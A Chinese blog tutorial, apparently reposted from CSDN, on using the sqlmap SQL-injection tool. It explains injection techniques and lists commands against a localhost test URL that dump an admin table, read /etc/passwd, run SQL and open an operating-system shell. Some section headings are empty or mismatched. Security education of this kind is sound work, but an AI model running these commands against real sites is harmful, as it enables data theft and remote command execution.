SQL注入——SQLmap使用
其他
2020-03-20 10:19:47
阅读次数: 0
什么是sqlmap
- SQLmap SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取完全操作权限时实行任意命令
|
SQLmap-工作原理
- 当给sqlmap这么一个url的时候,它会:
- 检测网站是否能够访问。
- 检测是否有waf。
- 判断可注入的参数。
- 判断可以用那种SQL注入技术来注入。
- 识别出哪种数据库。
- 根据用户输入的参数,进行操作。
|
SQLmap-特性
- 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
|
- 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
|
- 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
|
- 4、联合查询注入,可以使用union的情况下的注入。
|
- 5、堆查询注入,可以同时执行多条语句的执行时的注入。
|
|
SQLmap-支持的数据库类型
SQLmap-显示等级
SQLmap常规步骤
|
- sqlmap –u “http://127.0.0.1/test.php?id=1”
|
|
- sqlmap –u “http://127.0.0.1/test.php?id=1” --dbs
|
|
- sqlmap –u “http://127.0.0.1/test.php?id=1” --current-db
|
|
- sqlmap –u “http://127.0.0.1/test.php?id=1” -D sqlinject --tables
|
|
- sqlmap –u “http://127.0.0.1/test.php?id=1” -D sqlinject -T admin --columns
|
|
- sqlmap –u “http://127.0.0.1/test.php?id=1” -D sqlinject -T admin --dump
|
sqlmap读文件
满足以下条件:
- 1、secure-file-priv (show variables)
|
|
|
|
sqlmap写文件
- load_file(‘c://windows//win.ini’)
|
- load_file(0x633A2F2F77696E646F77732F2F77696E2E696E69)
|
- Sqlmap –u “http://127.0.0.1/1.php?id=1” --file-read “/etc/passwd”
|
- 写文件权限
- secure-file-priv (show variables)
- 目录权限
- 知道绝对路径
- 绕过单引号
|
Sqlmap执行sql语句
- Sqlmap –u “http://127.0.0.1/1.php?id=1” --sql-query=”select version()”
|
- Sqlmap –u “http://127.0.0.1/1.php?id=1” --sql-shell
|
- Sqlmap –u “http://127.0.0.1/1.php?id=1” --sql-file=“c:\1.sql”
|
Sqlmap执行系统命令
- sqlmap –u “http://127.0.0.1/1.php?id=1” --os-cmd=whoami
|
- sqlmap –u “http://127.0.0.1/1.php?id=1” --os-shell
|
发布了36 篇原创文章 ·
获赞 130 ·
访问量 2060
转载自blog.csdn.net/cldimd/article/details/104972552